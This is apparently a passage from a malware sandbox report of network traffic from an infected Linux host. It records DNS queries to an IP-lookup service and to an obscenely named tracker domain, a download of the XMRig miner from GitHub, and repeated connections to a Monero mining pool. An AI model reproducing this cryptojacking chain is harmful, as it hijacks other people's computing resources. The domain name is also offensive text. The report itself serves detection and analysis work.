                                  Sep 18, 2024 08:17:17.216995955 CEST42182443192.168.2.13141.94.96.195
                                  Sep 18, 2024 08:17:17.218108892 CEST42182443192.168.2.13141.94.96.195
                                  Sep 18, 2024 08:17:17.218149900 CEST44342182141.94.96.195192.168.2.13
                                  Sep 18, 2024 08:17:38.137839079 CEST42182443192.168.2.13141.94.96.195
                                  Sep 18, 2024 08:17:38.183429956 CEST44342182141.94.96.195192.168.2.13
                                  Sep 18, 2024 08:17:39.476677895 CEST44342182141.94.96.195192.168.2.13
                                  Sep 18, 2024 08:17:39.476777077 CEST42182443192.168.2.13141.94.96.195
                                  Sep 18, 2024 08:17:43.142914057 CEST42184443192.168.2.13141.94.96.195
                                  Sep 18, 2024 08:17:43.142951965 CEST44342184141.94.96.195192.168.2.13
                                  Sep 18, 2024 08:17:43.143024921 CEST42184443192.168.2.13141.94.96.195
                                  Sep 18, 2024 08:17:43.144222975 CEST42184443192.168.2.13141.94.96.195
                                  Sep 18, 2024 08:17:43.144268036 CEST44342184141.94.96.195192.168.2.13
                                  Sep 18, 2024 08:17:43.981190920 CEST44342184141.94.96.195192.168.2.13
                                  Sep 18, 2024 08:17:43.981443882 CEST42184443192.168.2.13141.94.96.195
                                  Sep 18, 2024 08:17:43.984237909 CEST42184443192.168.2.13141.94.96.195
                                  Sep 18, 2024 08:17:43.984266996 CEST44342184141.94.96.195192.168.2.13
                                  Sep 18, 2024 08:17:43.985837936 CEST44342184141.94.96.195192.168.2.13
                                  Sep 18, 2024 08:17:43.985923052 CEST42184443192.168.2.13141.94.96.195
                                  Sep 18, 2024 08:17:43.990605116 CEST42184443192.168.2.13141.94.96.195
                                  Sep 18, 2024 08:17:43.990704060 CEST44342184141.94.96.195192.168.2.13
                                  Sep 18, 2024 08:17:43.990762949 CEST42184443192.168.2.13141.94.96.195
                                  Sep 18, 2024 08:17:43.990781069 CEST44342184141.94.96.195192.168.2.13
                                  Sep 18, 2024 08:17:43.990833044 CEST42184443192.168.2.13141.94.96.195
                                  Sep 18, 2024 08:17:44.176690102 CEST44342184141.94.96.195192.168.2.13
                                  Sep 18, 2024 08:17:44.176949024 CEST42184443192.168.2.13141.94.96.195
                                  Sep 18, 2024 08:17:44.943897963 CEST44342184141.94.96.195192.168.2.13
                                  Sep 18, 2024 08:17:44.944067955 CEST42184443192.168.2.13141.94.96.195
                                  Sep 18, 2024 08:17:55.223057985 CEST44342184141.94.96.195192.168.2.13
                                  Sep 18, 2024 08:17:55.223268986 CEST42184443192.168.2.13141.94.96.195
                                  Sep 18, 2024 08:18:05.447570086 CEST44342184141.94.96.195192.168.2.13
                                  Sep 18, 2024 08:18:05.447702885 CEST42184443192.168.2.13141.94.96.195
                                  Sep 18, 2024 08:18:15.698909044 CEST44342184141.94.96.195192.168.2.13
                                  Sep 18, 2024 08:18:15.699146986 CEST42184443192.168.2.13141.94.96.195
                                  Sep 18, 2024 08:18:25.701795101 CEST44342184141.94.96.195192.168.2.13
                                  Sep 18, 2024 08:18:25.701910973 CEST42184443192.168.2.13141.94.96.195
                                  Sep 18, 2024 08:18:35.767879009 CEST44342184141.94.96.195192.168.2.13
                                  Sep 18, 2024 08:18:35.768039942 CEST42184443192.168.2.13141.94.96.195
                                  Sep 18, 2024 08:18:42.789012909 CEST44342184141.94.96.195192.168.2.13
                                  Sep 18, 2024 08:18:42.789133072 CEST42184443192.168.2.13141.94.96.195
                                  Sep 18, 2024 08:18:52.924601078 CEST44342184141.94.96.195192.168.2.13
                                  Sep 18, 2024 08:18:52.924741983 CEST42184443192.168.2.13141.94.96.195
                                  Sep 18, 2024 08:19:03.038414001 CEST44342184141.94.96.195192.168.2.13
                                  Sep 18, 2024 08:19:03.038537025 CEST42184443192.168.2.13141.94.96.195
                                  Sep 18, 2024 08:19:13.091860056 CEST44342184141.94.96.195192.168.2.13
                                  Sep 18, 2024 08:19:13.092005014 CEST42184443192.168.2.13141.94.96.195
                                  Sep 18, 2024 08:19:23.364474058 CEST44342184141.94.96.195192.168.2.13
                                  Sep 18, 2024 08:19:23.364600897 CEST42184443192.168.2.13141.94.96.195
                                  Sep 18, 2024 08:19:33.439050913 CEST44342184141.94.96.195192.168.2.13
                                  Sep 18, 2024 08:19:33.439280987 CEST42184443192.168.2.13141.94.96.195
                                  Sep 18, 2024 08:19:43.689229965 CEST44342184141.94.96.195192.168.2.13
                                  Sep 18, 2024 08:19:43.689412117 CEST42184443192.168.2.13141.94.96.195
                                  Sep 18, 2024 08:19:53.739780903 CEST44342184141.94.96.195192.168.2.13
                                  Sep 18, 2024 08:19:53.739999056 CEST42184443192.168.2.13141.94.96.195
                                  Sep 18, 2024 08:20:03.074120045 CEST44342184141.94.96.195192.168.2.13
                                  Sep 18, 2024 08:20:03.074255943 CEST42184443192.168.2.13141.94.96.195
                                  Sep 18, 2024 08:20:03.699229002 CEST44342184141.94.96.195192.168.2.13
                                  Sep 18, 2024 08:20:03.699357986 CEST42184443192.168.2.13141.94.96.195
                                  Sep 18, 2024 08:20:05.613353014 CEST44342184141.94.96.195192.168.2.13
                                  Sep 18, 2024 08:20:05.613514900 CEST42184443192.168.2.13141.94.96.195
                                  Sep 18, 2024 08:20:15.722105026 CEST44342184141.94.96.195192.168.2.13
                                  Sep 18, 2024 08:20:15.722338915 CEST42184443192.168.2.13141.94.96.195
                                  Sep 18, 2024 08:20:25.797677994 CEST44342184141.94.96.195192.168.2.13
                                  Sep 18, 2024 08:20:25.797806025 CEST42184443192.168.2.13141.94.96.195
                                  Sep 18, 2024 08:20:35.889004946 CEST44342184141.94.96.195192.168.2.13
                                  Sep 18, 2024 08:20:35.889130116 CEST42184443192.168.2.13141.94.96.195
                                  Sep 18, 2024 08:20:45.992640972 CEST44342184141.94.96.195192.168.2.13
                                  Sep 18, 2024 08:20:45.992773056 CEST42184443192.168.2.13141.94.96.195
                                  Sep 18, 2024 08:20:56.056622982 CEST44342184141.94.96.195192.168.2.13
                                  Sep 18, 2024 08:20:56.056742907 CEST42184443192.168.2.13141.94.96.195
                                  Sep 18, 2024 08:20:59.133997917 CEST44342184141.94.96.195192.168.2.13
                                  Sep 18, 2024 08:20:59.134227037 CEST42184443192.168.2.13141.94.96.195
                                  Sep 18, 2024 08:21:10.148967028 CEST44342184141.94.96.195192.168.2.13
                                  Sep 18, 2024 08:21:10.149202108 CEST42184443192.168.2.13141.94.96.195
                                  Sep 18, 2024 08:21:14.142860889 CEST44342184141.94.96.195192.168.2.13
                                  Sep 18, 2024 08:21:14.148035049 CEST42184443192.168.2.13141.94.96.195
                                  Sep 18, 2024 08:21:14.148063898 CEST44342184141.94.96.195192.168.2.13

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Sep 18, 2024 08:16:55.076517105 CEST5980853192.168.2.138.8.8.8
                                  Sep 18, 2024 08:16:55.078933954 CEST5896653192.168.2.138.8.8.8
                                  Sep 18, 2024 08:16:55.086359978 CEST53589668.8.8.8192.168.2.13
                                  Sep 18, 2024 08:16:55.087497950 CEST53598088.8.8.8192.168.2.13
                                  Sep 18, 2024 08:16:56.732480049 CEST5083553192.168.2.138.8.8.8
                                  Sep 18, 2024 08:16:56.734524012 CEST5205453192.168.2.138.8.8.8
                                  Sep 18, 2024 08:17:01.960983038 CEST4620553192.168.2.131.1.1.1
                                  Sep 18, 2024 08:17:01.960987091 CEST5205453192.168.2.138.8.8.8
                                  Sep 18, 2024 08:17:07.066066980 CEST4197453192.168.2.131.1.1.1
                                  Sep 18, 2024 08:17:07.066135883 CEST4973453192.168.2.138.8.8.8
                                  Sep 18, 2024 08:17:07.066135883 CEST6039753192.168.2.138.8.8.8
                                  Sep 18, 2024 08:17:07.069232941 CEST4476953192.168.2.138.8.8.8
                                  Sep 18, 2024 08:17:07.076183081 CEST53497348.8.8.8192.168.2.13
                                  Sep 18, 2024 08:17:07.076982021 CEST53447698.8.8.8192.168.2.13
                                  Sep 18, 2024 08:17:08.163542986 CEST3861453192.168.2.138.8.8.8
                                  Sep 18, 2024 08:17:08.168562889 CEST4619953192.168.2.138.8.8.8
                                  Sep 18, 2024 08:17:08.169997931 CEST53386148.8.8.8192.168.2.13
                                  Sep 18, 2024 08:17:08.175024033 CEST53461998.8.8.8192.168.2.13
                                  Sep 18, 2024 08:17:12.210689068 CEST4197453192.168.2.131.1.1.1
                                  Sep 18, 2024 08:17:12.210944891 CEST6039753192.168.2.138.8.8.8
                                  Sep 18, 2024 08:17:15.680336952 CEST5105353192.168.2.138.8.8.8
                                  Sep 18, 2024 08:17:15.680610895 CEST4829253192.168.2.138.8.8.8
                                  Sep 18, 2024 08:17:15.686913013 CEST53510538.8.8.8192.168.2.13
                                  Sep 18, 2024 08:17:15.687336922 CEST53482928.8.8.8192.168.2.13
                                  Sep 18, 2024 08:17:17.195596933 CEST4000153192.168.2.138.8.8.8
                                  Sep 18, 2024 08:17:17.195697069 CEST5800753192.168.2.138.8.8.8
                                  Sep 18, 2024 08:17:17.205005884 CEST53400018.8.8.8192.168.2.13
                                  Sep 18, 2024 08:17:17.205101013 CEST53580078.8.8.8192.168.2.13
                                  Sep 18, 2024 08:17:17.205370903 CEST4267853192.168.2.138.8.8.8
                                  Sep 18, 2024 08:17:17.213769913 CEST53426788.8.8.8192.168.2.13
                                  Sep 18, 2024 08:17:17.214051962 CEST5020553192.168.2.131.1.1.1
                                  Sep 18, 2024 08:17:17.214080095 CEST3409553192.168.2.138.8.8.8
                                  Sep 18, 2024 08:17:22.460756063 CEST5020553192.168.2.131.1.1.1
                                  Sep 18, 2024 08:17:22.460783958 CEST3409553192.168.2.138.8.8.8
                                  Sep 18, 2024 08:17:27.710624933 CEST5020553192.168.2.131.1.1.1
                                  Sep 18, 2024 08:17:27.710669041 CEST3409553192.168.2.138.8.8.8
                                  Sep 18, 2024 08:17:32.960623980 CEST5020553192.168.2.131.1.1.1
                                  Sep 18, 2024 08:17:32.960722923 CEST3409553192.168.2.138.8.8.8
                                  Sep 18, 2024 08:17:38.210711002 CEST5020553192.168.2.131.1.1.1
                                  Sep 18, 2024 08:17:38.210722923 CEST3409553192.168.2.138.8.8.8
                                  Sep 18, 2024 08:17:43.460661888 CEST5020553192.168.2.131.1.1.1
                                  Sep 18, 2024 08:17:43.460668087 CEST3409553192.168.2.138.8.8.8
                                  Sep 18, 2024 08:17:48.713536024 CEST5020553192.168.2.131.1.1.1
                                  Sep 18, 2024 08:17:48.713640928 CEST3409553192.168.2.138.8.8.8
                                  Sep 18, 2024 08:17:53.968014002 CEST5020553192.168.2.131.1.1.1
                                  Sep 18, 2024 08:17:53.970654964 CEST3409553192.168.2.138.8.8.8
                                  Sep 18, 2024 08:17:59.220052958 CEST5020553192.168.2.131.1.1.1
                                  Sep 18, 2024 08:17:59.221963882 CEST3409553192.168.2.138.8.8.8
                                  Sep 18, 2024 08:18:04.464683056 CEST5020553192.168.2.131.1.1.1
                                  Sep 18, 2024 08:18:04.466594934 CEST3409553192.168.2.138.8.8.8
                                  Sep 18, 2024 08:18:09.716324091 CEST5020553192.168.2.131.1.1.1
                                  Sep 18, 2024 08:18:09.718328953 CEST3409553192.168.2.138.8.8.8
                                  Sep 18, 2024 08:18:14.966790915 CEST5020553192.168.2.131.1.1.1
                                  Sep 18, 2024 08:18:14.967864990 CEST3409553192.168.2.138.8.8.8
                                  Sep 18, 2024 08:18:20.220388889 CEST5020553192.168.2.131.1.1.1
                                  Sep 18, 2024 08:18:20.223208904 CEST3409553192.168.2.138.8.8.8
                                  Sep 18, 2024 08:18:25.469666958 CEST5020553192.168.2.131.1.1.1
                                  Sep 18, 2024 08:18:25.471894026 CEST3409553192.168.2.138.8.8.8
                                  Sep 18, 2024 08:18:30.718439102 CEST5020553192.168.2.131.1.1.1
                                  Sep 18, 2024 08:18:30.720952988 CEST3409553192.168.2.138.8.8.8
                                  Sep 18, 2024 08:18:35.971513987 CEST5020553192.168.2.131.1.1.1
                                  Sep 18, 2024 08:18:35.972009897 CEST3409553192.168.2.138.8.8.8
                                  Sep 18, 2024 08:18:41.220294952 CEST5020553192.168.2.131.1.1.1
                                  Sep 18, 2024 08:18:41.222179890 CEST3409553192.168.2.138.8.8.8
                                  Sep 18, 2024 08:18:46.468657970 CEST5020553192.168.2.131.1.1.1
                                  Sep 18, 2024 08:18:46.470190048 CEST3409553192.168.2.138.8.8.8
                                  Sep 18, 2024 08:18:51.720191002 CEST5020553192.168.2.131.1.1.1
                                  Sep 18, 2024 08:18:51.723896027 CEST3409553192.168.2.138.8.8.8
                                  Sep 18, 2024 08:18:56.971174955 CEST5020553192.168.2.131.1.1.1
                                  Sep 18, 2024 08:18:56.975846052 CEST3409553192.168.2.138.8.8.8
                                  Sep 18, 2024 08:19:41.618438005 CEST4175553192.168.2.138.8.8.8
                                  Sep 18, 2024 08:19:41.619297981 CEST5088953192.168.2.138.8.8.8
                                  Sep 18, 2024 08:19:41.835853100 CEST53508898.8.8.8192.168.2.13
                                  Sep 18, 2024 08:19:41.835896015 CEST53417558.8.8.8192.168.2.13

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Sep 18, 2024 08:16:55.076517105 CEST192.168.2.138.8.8.80x9885Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:16:55.078933954 CEST192.168.2.138.8.8.80xe8a8Standard query (0)api.ipify.org28IN (0x0001)false
                                  Sep 18, 2024 08:16:56.732480049 CEST192.168.2.138.8.8.80x5337Standard query (0)vmtracker.freechildporninthisserver.lol28IN (0x0001)false
                                  Sep 18, 2024 08:16:56.734524012 CEST192.168.2.138.8.8.80xab9bStandard query (0)vmtracker.freechildporninthisserver.lolA (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:17:01.960983038 CEST192.168.2.131.1.1.10x5337Standard query (0)vmtracker.freechildporninthisserver.lol28IN (0x0001)false
                                  Sep 18, 2024 08:17:01.960987091 CEST192.168.2.138.8.8.80xab9bStandard query (0)vmtracker.freechildporninthisserver.lolA (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:17:07.066066980 CEST192.168.2.131.1.1.10xab9bStandard query (0)vmtracker.freechildporninthisserver.lolA (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:17:07.066135883 CEST192.168.2.138.8.8.80xa93fStandard query (0)github.comA (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:17:07.066135883 CEST192.168.2.138.8.8.80x5337Standard query (0)vmtracker.freechildporninthisserver.lol28IN (0x0001)false
                                  Sep 18, 2024 08:17:07.069232941 CEST192.168.2.138.8.8.80x5f48Standard query (0)github.com28IN (0x0001)false
                                  Sep 18, 2024 08:17:08.163542986 CEST192.168.2.138.8.8.80xb2a3Standard query (0)objects.githubusercontent.com28IN (0x0001)false
                                  Sep 18, 2024 08:17:08.168562889 CEST192.168.2.138.8.8.80x4aa0Standard query (0)objects.githubusercontent.comA (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:17:12.210689068 CEST192.168.2.131.1.1.10xab9bStandard query (0)vmtracker.freechildporninthisserver.lolA (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:17:12.210944891 CEST192.168.2.138.8.8.80x5337Standard query (0)vmtracker.freechildporninthisserver.lol28IN (0x0001)false
                                  Sep 18, 2024 08:17:15.680336952 CEST192.168.2.138.8.8.80xd4f2Standard query (0)raw.githubusercontent.com28IN (0x0001)false
                                  Sep 18, 2024 08:17:15.680610895 CEST192.168.2.138.8.8.80x184bStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:17:17.195596933 CEST192.168.2.138.8.8.80x5b48Standard query (0)pool.supportxmr.comA (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:17:17.195697069 CEST192.168.2.138.8.8.80x1d0dStandard query (0)pool.supportxmr.com28IN (0x0001)false
                                  Sep 18, 2024 08:17:17.205370903 CEST192.168.2.138.8.8.80x7f6fStandard query (0)pool-fr.supportxmr.com28IN (0x0001)false
                                  Sep 18, 2024 08:17:17.214051962 CEST192.168.2.131.1.1.10x5337Standard query (0)vmtracker.freechildporninthisserver.lol28IN (0x0001)false
                                  Sep 18, 2024 08:17:17.214080095 CEST192.168.2.138.8.8.80xab9bStandard query (0)vmtracker.freechildporninthisserver.lolA (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:17:22.460756063 CEST192.168.2.131.1.1.10x5337Standard query (0)vmtracker.freechildporninthisserver.lol28IN (0x0001)false
                                  Sep 18, 2024 08:17:22.460783958 CEST192.168.2.138.8.8.80xab9bStandard query (0)vmtracker.freechildporninthisserver.lolA (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:17:27.710624933 CEST192.168.2.131.1.1.10x5337Standard query (0)vmtracker.freechildporninthisserver.lol28IN (0x0001)false
                                  Sep 18, 2024 08:17:27.710669041 CEST192.168.2.138.8.8.80xab9bStandard query (0)vmtracker.freechildporninthisserver.lolA (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:17:32.960623980 CEST192.168.2.131.1.1.10x5337Standard query (0)vmtracker.freechildporninthisserver.lol28IN (0x0001)false
                                  Sep 18, 2024 08:17:32.960722923 CEST192.168.2.138.8.8.80xab9bStandard query (0)vmtracker.freechildporninthisserver.lolA (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:17:38.210711002 CEST192.168.2.131.1.1.10x5337Standard query (0)vmtracker.freechildporninthisserver.lol28IN (0x0001)false
                                  Sep 18, 2024 08:17:38.210722923 CEST192.168.2.138.8.8.80xab9bStandard query (0)vmtracker.freechildporninthisserver.lolA (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:17:43.460661888 CEST192.168.2.131.1.1.10x5337Standard query (0)vmtracker.freechildporninthisserver.lol28IN (0x0001)false
                                  Sep 18, 2024 08:17:43.460668087 CEST192.168.2.138.8.8.80xab9bStandard query (0)vmtracker.freechildporninthisserver.lolA (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:17:48.713536024 CEST192.168.2.131.1.1.10x5337Standard query (0)vmtracker.freechildporninthisserver.lol28IN (0x0001)false
                                  Sep 18, 2024 08:17:48.713640928 CEST192.168.2.138.8.8.80xab9bStandard query (0)vmtracker.freechildporninthisserver.lolA (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:17:53.968014002 CEST192.168.2.131.1.1.10x5337Standard query (0)vmtracker.freechildporninthisserver.lol28IN (0x0001)false
                                  Sep 18, 2024 08:17:53.970654964 CEST192.168.2.138.8.8.80xab9bStandard query (0)vmtracker.freechildporninthisserver.lolA (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:17:59.220052958 CEST192.168.2.131.1.1.10x5337Standard query (0)vmtracker.freechildporninthisserver.lol28IN (0x0001)false
                                  Sep 18, 2024 08:17:59.221963882 CEST192.168.2.138.8.8.80xab9bStandard query (0)vmtracker.freechildporninthisserver.lolA (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:18:04.464683056 CEST192.168.2.131.1.1.10x5337Standard query (0)vmtracker.freechildporninthisserver.lol28IN (0x0001)false
                                  Sep 18, 2024 08:18:04.466594934 CEST192.168.2.138.8.8.80xab9bStandard query (0)vmtracker.freechildporninthisserver.lolA (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:18:09.716324091 CEST192.168.2.131.1.1.10x5337Standard query (0)vmtracker.freechildporninthisserver.lol28IN (0x0001)false
                                  Sep 18, 2024 08:18:09.718328953 CEST192.168.2.138.8.8.80xab9bStandard query (0)vmtracker.freechildporninthisserver.lolA (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:18:14.966790915 CEST192.168.2.131.1.1.10x5337Standard query (0)vmtracker.freechildporninthisserver.lol28IN (0x0001)false
                                  Sep 18, 2024 08:18:14.967864990 CEST192.168.2.138.8.8.80xab9bStandard query (0)vmtracker.freechildporninthisserver.lolA (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:18:20.220388889 CEST192.168.2.131.1.1.10x5337Standard query (0)vmtracker.freechildporninthisserver.lol28IN (0x0001)false
                                  Sep 18, 2024 08:18:20.223208904 CEST192.168.2.138.8.8.80xab9bStandard query (0)vmtracker.freechildporninthisserver.lolA (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:18:25.469666958 CEST192.168.2.131.1.1.10x5337Standard query (0)vmtracker.freechildporninthisserver.lol28IN (0x0001)false
                                  Sep 18, 2024 08:18:25.471894026 CEST192.168.2.138.8.8.80xab9bStandard query (0)vmtracker.freechildporninthisserver.lolA (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:18:30.718439102 CEST192.168.2.131.1.1.10x5337Standard query (0)vmtracker.freechildporninthisserver.lol28IN (0x0001)false
                                  Sep 18, 2024 08:18:30.720952988 CEST192.168.2.138.8.8.80xab9bStandard query (0)vmtracker.freechildporninthisserver.lolA (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:18:35.971513987 CEST192.168.2.131.1.1.10x5337Standard query (0)vmtracker.freechildporninthisserver.lol28IN (0x0001)false
                                  Sep 18, 2024 08:18:35.972009897 CEST192.168.2.138.8.8.80xab9bStandard query (0)vmtracker.freechildporninthisserver.lolA (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:18:41.220294952 CEST192.168.2.131.1.1.10x5337Standard query (0)vmtracker.freechildporninthisserver.lol28IN (0x0001)false
                                  Sep 18, 2024 08:18:41.222179890 CEST192.168.2.138.8.8.80xab9bStandard query (0)vmtracker.freechildporninthisserver.lolA (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:18:46.468657970 CEST192.168.2.131.1.1.10x5337Standard query (0)vmtracker.freechildporninthisserver.lol28IN (0x0001)false
                                  Sep 18, 2024 08:18:46.470190048 CEST192.168.2.138.8.8.80xab9bStandard query (0)vmtracker.freechildporninthisserver.lolA (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:18:51.720191002 CEST192.168.2.131.1.1.10x5337Standard query (0)vmtracker.freechildporninthisserver.lol28IN (0x0001)false
                                  Sep 18, 2024 08:18:51.723896027 CEST192.168.2.138.8.8.80xab9bStandard query (0)vmtracker.freechildporninthisserver.lolA (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:18:56.971174955 CEST192.168.2.131.1.1.10x5337Standard query (0)vmtracker.freechildporninthisserver.lol28IN (0x0001)false
                                  Sep 18, 2024 08:18:56.975846052 CEST192.168.2.138.8.8.80xab9bStandard query (0)vmtracker.freechildporninthisserver.lolA (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:19:41.618438005 CEST192.168.2.138.8.8.80xd808Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:19:41.619297981 CEST192.168.2.138.8.8.80xae5cStandard query (0)daisy.ubuntu.com28IN (0x0001)false

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Sep 18, 2024 08:16:55.087497950 CEST8.8.8.8192.168.2.130x9885No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:16:55.087497950 CEST8.8.8.8192.168.2.130x9885No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:16:55.087497950 CEST8.8.8.8192.168.2.130x9885No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:17:07.076183081 CEST8.8.8.8192.168.2.130xa93fNo error (0)github.com140.82.121.4A (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:17:08.175024033 CEST8.8.8.8192.168.2.130x4aa0No error (0)objects.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:17:08.175024033 CEST8.8.8.8192.168.2.130x4aa0No error (0)objects.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:17:08.175024033 CEST8.8.8.8192.168.2.130x4aa0No error (0)objects.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:17:08.175024033 CEST8.8.8.8192.168.2.130x4aa0No error (0)objects.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:17:15.686913013 CEST8.8.8.8192.168.2.130xd4f2No error (0)raw.githubusercontent.com28IN (0x0001)false
                                  Sep 18, 2024 08:17:15.686913013 CEST8.8.8.8192.168.2.130xd4f2No error (0)raw.githubusercontent.com28IN (0x0001)false
                                  Sep 18, 2024 08:17:15.686913013 CEST8.8.8.8192.168.2.130xd4f2No error (0)raw.githubusercontent.com28IN (0x0001)false
                                  Sep 18, 2024 08:17:15.686913013 CEST8.8.8.8192.168.2.130xd4f2No error (0)raw.githubusercontent.com28IN (0x0001)false
                                  Sep 18, 2024 08:17:15.687336922 CEST8.8.8.8192.168.2.130x184bNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:17:15.687336922 CEST8.8.8.8192.168.2.130x184bNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:17:15.687336922 CEST8.8.8.8192.168.2.130x184bNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:17:15.687336922 CEST8.8.8.8192.168.2.130x184bNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:17:17.205005884 CEST8.8.8.8192.168.2.130x5b48No error (0)pool.supportxmr.compool-fr.supportxmr.comCNAME (Canonical name)IN (0x0001)false
                                  Sep 18, 2024 08:17:17.205005884 CEST8.8.8.8192.168.2.130x5b48No error (0)pool-fr.supportxmr.com141.94.96.195A (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:17:17.205005884 CEST8.8.8.8192.168.2.130x5b48No error (0)pool-fr.supportxmr.com141.94.96.144A (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:17:17.205005884 CEST8.8.8.8192.168.2.130x5b48No error (0)pool-fr.supportxmr.com141.94.96.71A (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:17:17.205101013 CEST8.8.8.8192.168.2.130x1d0dNo error (0)pool.supportxmr.compool-fr.supportxmr.comCNAME (Canonical name)IN (0x0001)false
                                  Sep 18, 2024 08:19:41.835896015 CEST8.8.8.8192.168.2.130xd808No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                                  Sep 18, 2024 08:19:41.835896015 CEST8.8.8.8192.168.2.130xd808No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false

                                  HTTP Request Dependency Graph

                                  • api.ipify.org
                                  • github.com
                                  • https:
                                    • objects.githubusercontent.com
                                  • raw.githubusercontent.com

                                  HTTPS Proxied Packets

                                  Session IDSource IPSource PortDestination IPDestination Port
                                  0192.168.2.1359946104.26.13.205443
                                  TimestampBytes transferredDirectionData
                                  2024-09-18 06:16:56 UTC106OUTGET /?format=text HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: Go-http-client/1.1
                                  Accept-Encoding: gzip
                                  2024-09-18 06:16:56 UTC211INHTTP/1.1 200 OK
                                  Date: Wed, 18 Sep 2024 06:16:56 GMT
                                  Content-Type: text/plain
                                  Content-Length: 11
                                  Connection: close
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8c4f35ca0f984319-EWR
                                  2024-09-18 06:16:56 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  1192.168.2.1354894140.82.121.4443
                                  TimestampBytes transferredDirectionData
                                  2024-09-18 06:17:07 UTC165OUTGET /xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-linux-static-x64.tar.gz HTTP/1.1
                                  Host: github.com
                                  User-Agent: Go-http-client/1.1
                                  Accept-Encoding: gzip
                                  2024-09-18 06:17:08 UTC1019INHTTP/1.1 302 Found
                                  Server: GitHub.com
                                  Date: Wed, 18 Sep 2024 06:17:08 GMT
                                  Content-Type: text/html; charset=utf-8
                                  Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                  Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/88327406/d0ce794d-b593-4f8f-bb2d-6bfa0096266b?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240918%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240918T061708Z&X-Amz-Expires=300&X-Amz-Signature=00531079fb788ace60d0eb8b92c6dc27d7d59c703c0049561047ae2f2958161a&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=88327406&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.21.3-linux-static-x64.tar.gz&response-content-type=application%2Foctet-stream
                                  Cache-Control: no-cache
                                  Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                  X-Frame-Options: deny
                                  X-Content-Type-Options: nosniff
                                  X-XSS-Protection: 0
                                  Referrer-Policy: no-referrer-when-downgrade
